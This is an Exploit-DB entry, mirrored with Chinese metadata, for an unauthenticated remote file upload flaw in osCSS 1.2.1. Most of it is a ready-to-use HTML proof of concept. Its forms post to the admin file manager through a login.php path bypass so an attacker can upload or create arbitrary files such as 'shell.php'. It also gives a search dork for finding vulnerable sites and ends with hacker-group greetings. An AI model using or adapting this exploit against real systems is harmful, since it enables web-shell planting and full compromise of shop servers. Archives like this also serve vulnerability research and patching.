osCSS 1.2.1 – Arbitrary File Upload

  • 作者: indoushka
    日期: 2010-06-03
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12856/
  • ======================================================================= 
    # osCSS 1.2.1 (REMOTE FILE UPLOAD) Vulnerabilities 
    ======================================================================= 
    
    ######################################################################## 
    # Vendor: http://www.oscommerce.com/ 
    # Date: 2010-05-27 
    # Author : indoushka 
    # Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! 
    # Contact : indoushka@hotmail.com 
    # Home : www.arab-blackhat.co.cc
    # Dork : E-Commerce Engine Copyright © 2005 osCSS 
    # Bug: Remote File Upload 
    # Tested on : windows SP2 Français V.(Pnx2 2.0) 
    ######################################################################## 
    
    # Exploit By indoushka 
    
    <html><head><title> osCSS 1.2.1 - Remote File Upload </title></head> 
    
    <br><br><u>UPLOAD FILE:</u><br> 
    
    <form name="file" action="http://<--CHANGE HERE -->/admin/file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data"> 
    
    <input type="file" name="file_1"><br> 
    
    <input name="submit" type="submit" value=" Upload " > 
    
    </form> 
    
    <br><u>CREATE FILE:</u><br> 
    
    <form name="new_file" action="http://<--CHANGE HERE -->/admin/file_manager.php/login.php?action=save" method="post"> 
    
    FILE NAME:<br> 
    
    <input type="text" name="filename">&nbsp; (ex. shell.php)<br>FILE CONTENTS:<br> 
    
    <textarea name="file_contents" wrap="soft" cols="70" rows="10">&lt;/textarea&gt; 
    
    <input name="submit" type="submit" value=" Save " > 
    
    </form> 
    
    </html> 
    
    Go to Original path to finde what you upload : http://127.0.0.1/osCSS/ch99.php
    
    Dz-Ghost Team : Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel :
    all my friend :
    His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
    Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N